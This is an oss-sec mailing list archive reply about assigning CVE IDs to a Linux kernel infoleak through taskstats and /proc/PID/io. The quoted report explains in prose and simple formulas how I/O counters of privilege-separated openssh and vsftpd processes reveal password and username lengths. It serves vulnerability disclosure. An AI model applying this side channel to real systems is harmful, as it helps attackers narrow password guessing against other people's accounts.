oss-sec mailing list archives

Previous By Date Next
Previous By Thread Next

Re: CVE request: kernel: taskstats/procfs io infoleak (was: taskstats authorized_keys presence infoleak PoC)

From: Josh Bressers <bressers () redhat com>
Date: Tue, 28 Jun 2011 16:22:40 -0400 (EDT)
----- Original Message -----


It can be used to learn ssh and ftp password length. If privsep is
enabled in openssh and vsftpd, the unprivileged process' activity very
precisely shows password information.

For vsftpd read characters count is strlen("USER username\r\n") +
strlen("PASSWD pass\r\n") + 1, where 1 is one byte read from a pipe
related to a privileged parent. If measure statistics between user and
passwords commands, actual password length and username length can be
gathered.

For ssh, vice versa, networking activity is constant in packets length,
but interprocess communications, specifically passwords, depend on user
input.

For ssh pass_len = wchars - CONST, for vsftpd pass_len = rchars -
CONST.

Another daemons with more or less constant io activity might be
vulnerable too. PAM greatly complicates precise measurements.


I think it needs 2 CVE, one for /proc/PID/io and another for
taskstats.

https://lkml.org/lkml/2011/6/24/88



I can't find a nice description of both issues. Can you give me one or two
sentence explanations with a few references for the CVE database?

Once I have those I'll give it two IDs.

Thanks.

-- 
    JB
Previous By Date Next
Previous By Thread Next

Current thread: